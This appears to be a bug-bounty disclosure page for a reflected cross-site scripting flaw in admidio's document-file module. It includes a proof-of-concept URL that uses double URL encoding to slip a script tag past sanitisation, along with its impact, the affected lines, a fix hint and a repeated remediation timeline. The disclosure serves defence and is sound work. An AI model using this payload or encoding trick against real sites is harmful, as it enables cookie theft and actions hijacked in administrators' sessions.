Cross-site Scripting (XSS) - Reflected in admidio/admidio

Valid

Reported on

Oct 18th 2021

Description

Possible to perform reflected XSS by using double URL encoding when retrieving files

Proof of Concept

Trigger XSS via

http://10.0.2.15/admidio/adm_program/modules/documents-files/documents_files_function.php?mode=6&folder_id=1&name=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e

Impact

Possible trick admin users to visit the malicious link, executing the XSS and allowing cookies to be stolen, it is also possible to execute actions as admin user via malicious Javascript.

Occurrences

documents_files_function.php L178L190

html sanitisation should be done after all input has been transformed

We have contacted a member of the admidio team and are waiting to hear back 2 years ago

haxatron modified the report

2 years ago

Markus Faßbender validated this vulnerability 2 years ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

Markus Faßbender marked this as fixed with commit 01a83d 2 years ago

Markus Faßbender has been awarded the fix bounty

This vulnerability will not receive a CVE

documents_files_function.php#L178L190 has been validated

to join this conversation

We have contacted a member of the admidio team and are waiting to hear back 2 years ago

haxatron modified the report

2 years ago

Markus Faßbender validated this vulnerability 2 years ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

Markus Faßbender marked this as fixed with commit 01a83d 2 years ago

Markus Faßbender has been awarded the fix bounty

This vulnerability will not receive a CVE

documents_files_function.php#L178L190 has been validated

to join this conversation